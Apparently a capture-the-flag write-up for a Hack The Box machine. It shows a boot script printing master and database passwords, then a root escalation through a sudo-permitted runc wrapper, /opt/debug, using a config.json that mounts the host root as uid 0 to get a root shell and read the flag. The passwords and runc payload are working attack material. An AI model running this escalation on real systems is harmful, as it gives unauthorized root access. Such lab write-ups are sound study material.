Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Zrayvz94wxcw9JyxzOg9SX6F7zMP8p1z
Local MASTERPASS (from temp file): Zrayvz94wxcw9JyxzOg9SX6F7zMP8p1z
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Local MASTERPASS (from temp file): A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
 

sudo /opt/debug

  • this password from the secret works: `/opt/debug` accepts the `mariadb-password` value as it appears in the secret (the base64 text `c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T`, which decodes to the wp-config `DB_PASSWORD` `sW5sp4spa3u7RLyetrekE4oS`) as its administrative password
sh
      "data": {
        "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
        "mariadb-root-password": "c1c1c3A0c3lldHJlMzI4MjgzODNrRTRvUw=="
      },
sh
babywyrm@giveback:/opt$ sudo /opt/debug
Validating sudo...
Please enter the administrative password: c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
 
Both passwords verified. Executing the command...
NAME:
   runc - Open Container Initiative runtime
 
runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
 
runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.
 
Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.
 
To start a new instance of a container:
 
    # runc run [ -b bundle ] <container-id>
 
Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for "bundle" is the current directory.
 
USAGE:
   runc.amd64.debug [global options] command [command options] [arguments...]
 
VERSION:
   1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4
 
COMMANDS:
   checkpoint  checkpoint a running container
   create      create a container
   delete      delete any resources held by the container often used with detached container
   events      display container events such as OOM notifications, cpu, memory, and IO usage statistics
   exec        execute new process inside the container
   kill        kill sends the specified signal (default: SIGTERM) to the container's init process
   list        lists containers started by runc with the given root
   pause       pause suspends all processes inside the container
   ps          ps displays the processes running inside a container
   restore     restore a container from a previous checkpoint
   resume      resumes all processes that have been previously paused
   run         create and run a container
   spec        create a new specification file
   start       executes the user defined process in a created container
   state       output the state of a container
   update      update container resource constraints
   features    show the enabled features
   help, h     Shows a list of commands or help for one command
 
GLOBAL OPTIONS:
   --debug             enable debug logging
   --log value         set the log file to write runc logs to (default is '/dev/stderr')
   --log-format value  set the log format ('text' (default), or 'json') (default: "text")
   --root value        root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
   --criu value        path to the criu binary used for checkpoint and restore (default: "criu")
   --systemd-cgroup    enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
   --rootless value    ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")
   --help, -h          show help
   --version, -v       print the version
 

RunC privilege escalation — `/opt/debug` runs runc as root with a caller-supplied bundle, so a `config.json` whose `root.path` is `/` and whose process runs as uid 0 simply spawns a root shell over the host filesystem (the pid/network namespaces in the config do not isolate the filesystem at all).

  • https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/runc-privilege-escalation.html
sh
babywyrm@giveback:/tmp$ mkdir escape
cd escape

config.json (note `root.path` is `/`: the host filesystem is used directly, so the `rootfs/bin/sh` copy made below in /tmp/runc_escape is never referenced — the bundle is actually run from /tmp/escape)

json
{
    "ociVersion": "1.0.0",
    "process": {
        "terminal": false,
        "user": {"uid": 0, "gid": 0},
        "args": ["/bin/sh", "-i"],
        "cwd": "/",
        "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
    },
    "root": {"path": "/"},
    "linux": {
        "namespaces": [
            {"type": "pid"},
            {"type": "network"}
        ]
    }
}
sh
babywyrm@giveback:/tmp/runc_escape$ mkdir -p rootfs/bin
babywyrm@giveback:/tmp/runc_escape$ cp /usr/bin/sh rootfs/bin/
sh
babywyrm@giveback:/tmp/escape$ sudo debug run fakecontainter
sudo: debug: command not found
babywyrm@giveback:/tmp/escape$ sudo /opt/debug run fakecontainter
[sudo] password for babywyrm: 
Validating sudo...
Please enter the administrative password: 
 
Both passwords verified. Executing the command...
/bin/sh: 0: can't access tty; job control turned off
# ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
# whoami
root

root

sh
# cd /root
# ls
# HTB
audit__.sh
coredns
dns.sh
helm
iptables_rules.sh
kubeseal
phpcgi
python
root.txt
wordpress
cat root.txt
6470305f...